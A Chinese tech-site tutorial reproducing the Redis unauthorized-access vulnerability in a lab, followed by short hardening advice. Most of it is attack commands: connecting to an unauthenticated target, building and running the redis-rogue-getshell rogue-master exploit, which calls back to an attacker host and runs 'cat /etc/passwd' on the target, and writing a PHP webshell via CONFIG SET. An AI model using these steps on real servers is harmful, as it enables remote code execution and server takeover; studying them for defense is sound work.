IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> Redis未授权访问 -> 正文阅读

[大数据]Redis未授权访问

漏洞简介

redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。

漏洞影响版本

Redis 4.x/5.0.5以前版本

漏洞复现

未授权访问远程连接

将redis_cli压缩包放置kali攻击机解压

tar -xzf redis-2.8.12.tar.gz
cd redis-2.8.12
make
cd redis-2.8.12/src/
./redis-cli -h 目标ip

?info命令查看redis服务器相关信息

?使用现有exp实现远程代码执行

克隆exp项目,不成功的话,到网站下载安装包,在kali中解压

git clone https://github.com/vulhub/redis-rogue-getshell.git 

进入目录

cd redis-rogue-getshell-master/RedisModulesSDK/exp  

?编译生成exp,在当前目录下生成一个exp.so文件 ??

make

?

?查看信息,在redis-rogue-getshell-master目录下

./redis-master.py -r 192.168.254.131 -p 6379 -L 192.168.254.128 -P 1111 -f RedisModulesSDK/exp/exp.so -c "cat/etc/passwd"  
//第一个ip是靶机,第二个ip是攻击机

写入webshell

config set dir /var/tmp    //指定工作目录
config set dbfilename tyc.php   //设置数据库文件名
set trojan "<?php phpinfo();?>"    //追加写入tyc.php文件内容
save 

?查看靶机,上传成功

漏洞防御

禁止绑定公网(本地缓存)

redis.conf: bind 127.0.0.1 //redis本来就是作为内存数据库,只要监听在本机即可

密码验证

配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中

降权运行

禁止使用 root 权限启动 redis 服务

  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2022-03-06 13:08:12  更:2022-03-06 13:10:31 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 10:55:48-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码